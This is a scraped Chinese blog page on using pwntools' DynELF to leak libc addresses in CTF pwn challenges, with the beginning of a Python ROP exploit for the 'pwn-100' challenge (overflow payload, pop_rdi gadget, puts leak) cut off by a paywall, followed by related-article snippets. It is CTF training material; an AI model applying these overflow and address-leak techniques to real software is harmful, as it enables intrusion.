pwn libc之Dynelf工具

最新推荐文章于 2023-09-16 23:52:06 发布
最新推荐文章于 2023-09-16 23:52:06 发布
阅读量593 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42689613/article/details/115407485
版权
本文介绍了Dynelf工具在pwn挑战中的应用,如何通过泄露的地址找到libc版本对应的system函数,但指出该工具无法查找字符串"/bin/sh"的地址。在找到system后,通常需要寻找可写内存区域利用read函数读入"/bin/sh"。讨论了在pwn-100, pwn-200和welpwn等不同难度级别挑战中的适用情况,建议尽量避免依赖Dynelf,仅在必要时使用。" 134907921,18043917,Pytorch模型剪枝实战:YOLOv5中的剪枝策略,"['深度学习', '模型压缩', 'YOLO', 'Pytorch']

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh"

pwn-100

#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="amd64", log_level="debug")
contentt = 1

#elf
elf=ELF("pwn-100")
puts_plt=elf.plt['puts']
read_got=elf.got['read']
main_addr=0x400550#0x4006b8
pop_rdi=0x400763
ret_addr=0x4004e1

binsh_addr=0x601040

#csu
pop6_addr=0x40075A
mov3_addr=0x400740
offset=0x48


def leak(addr):
    up=b''
    content=b''
    payload=b'a'*(0x40+8)+p64(pop_rdi)+p64(addr)+p64(puts_plt)+p64(main_addr)
    payload=payload.ljust(200,b'b')
    io.send(payload)
    io.recvuntil("bye~\n")
    while True:
        chr=io.recv(numb=1,timeout=0.1)
        if up == b'\n' and chr == b"":
            content=content[:-1]+b'\x00'
            break
        else:
最低0.47元/天 解锁文章
qingmu-z
关注
pwntools中DynELF使用
weixin_41038905的博客
04-19 957
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具pwntools中的D以内ELF模块。 DynEL...
DynELF
钞sir的博客
01-29 6391
我用三生的期许 换回三世相思雨 三千浮沉里的你 迷失轮回的自己
[PWN] jarvisoj_level4 DynELF()函数使用总结
LDX的博客
09-16 224
DynELF使用技巧和示例
Pwn-栈溢出之DynELF
CharlesGodX的博客
03-08 1014
0x00:前言 DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下 p = process('./xxx') def leak(address): payload = "xxxxxxxx" + a...
DynELFpwn200
weixin_44464829的博客
11-15 247
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntools 的 DynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELFpwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
没有对方libc文件,如何getshell?xdctf12 pwn200 与 welpwn 的 writeup
哒君的博客
07-26 466
DynELF 文档:https://pwntools.readthedocs.io/en/stable/dynelf.html 简单来说,DynELF可以泄漏对方的libc信息 关于DynELF的原理,这个博客讲的很详细
pwn入门之栈溢出练习
xiaoi123的博客
09-10 4742
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn的栈溢出,做了一下jarvisoj里的一些ctf pwn题,感觉质量都很不错,难度循序渐进,把自己做题的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位) 代码  也就是输出Hel...
栈溢出利用之DynELF实例
M021的专栏
10-07 4224
libc库函数时,利用DynELF实现漏洞利用
HITCTF PWN300--dynelf
Vccxx的博客
04-08 1116
第一次用Dynelf,脚本调了一下午。。hitctf pwn300题目链接:http://pan.baidu.com/s/1eSCCOE2漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。攻击脚本:from pwn import * io = pr
64位下pwntools中dynELF函数的使用
weixin_30362233的博客
12-07 412
这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法 编译好的程序http://pan.baidu.com/s/1jImF95O 源码在后面 from pwn import * elf = ELF('./pwn_final') got_write = elf.got['write'] print 'got_write= ' + ...
pwn 练习笔记 暑假第八天 DynELF模块
SsMing的博客
07-20 1959
继续昨天的未解之谜,leve4 在第二次感受火狐崩溃带来的绝望之后,在此立誓,再也不用火狐写博客 IDA打开查看一下伪代码: 图没截全,罢啦罢啦!那vul函数就看汇编吧 可看出,我们输入的字符串与ebp距离为0x88 checksec查看,开了nx保护 ROPgadget查看,没有‘/bin/sh’ DynELFpwntools中专门用来应对无libc情况的漏洞利用模块...
pwn 查看陌生libc的版本
yongbaoii的博客
05-07 1864
我们经常在做一些pwn题的时候需要知道它的libc版本 因为不同的版本会有不同的影响,libc-2.24之后vtable多了检查,libc-2.27之后多了tcache。 那么题目给一个陌生的libc怎么知道它对应的版本? 拖到IDA里面。然后在字符串窗口搜索GNU就好了。 ...
【ctf】 关于确定靶机上的libc版本
qq_31808893的博客
02-07 579
记录一下经验,有时候通过泄露的单一地址 如 puts printf 等用工具查或者手动查会查出很多libc版本,一个个试是一种办法,不过有一种方法可以更精确确定libc版本。
pwn】ROP--retlibc
Joaus的博客
04-27 715
ROP中对retlibc技术的一些学习心得 漏洞利用思路: 1.找到泄露库函数地址的漏洞,获取libc版本(因为一般不会给你libc.so文件) 查询libc版本一般有三种方法: 1.libcsearcher库。在编写exp的时候用from LibcSearcher import LibcSearcher导入 通过libc.dump('system')可以得到system函数的偏移,libc.du...
DynELF的原理及应用
Sakura给爷pwn全场
03-29 630
Pwntools之DynELF原理探究: https://www.freebuf.com/articles/system/193646.html
DynELF模块和通用gadget实现libc通杀(详细注释)
weixin_48066554的博客
06-22 845
DynELF模块和通用gadget实现libc通杀(详细注释) 文章目录用DynELF模块和通用gadget实现libc通杀(详细注释)泄露libc版本方式x86版本x64版本万能gadgetret2libcx86版本x64版本 泄露libc版本方式 主要原理:利用栈溢出等写入栈的手段调用write或者puts函数,并控制write或puts函数参数泄露libc函数真实地址 write函数特点:可以控制大小,但是在64位程序中需要使用gadget进行寄存器传参,有时可能碰不到合适gadget puts函
ROP实例分析(二)---------------------------DynELF使用
iDevil7的博客
07-13 750
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,其基本代码框架如下。需要使用者进行的工作主要集中在leak函数的具体实现上,上面的代码只是个模板。其中,address就是leak函数要泄漏信息的起始地址,而payload就是触发目标程序泄漏address处信息的攻击代码。A.使用条件不管有没有libc文件,要想获得目标系统的system函数地址,首先都要求目标二进制程序...
dynelf+bss
最新发布
03-31
还需要考虑用户可能的实际应用场景,比如在逆向工程或漏洞利用中使用DynELF工具来解析地址,或者开发中如何管理BSS段变量。可能需要提供代码示例,比如展示BSS段变量的定义,或者使用DynELF的示例代码。 另外,用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值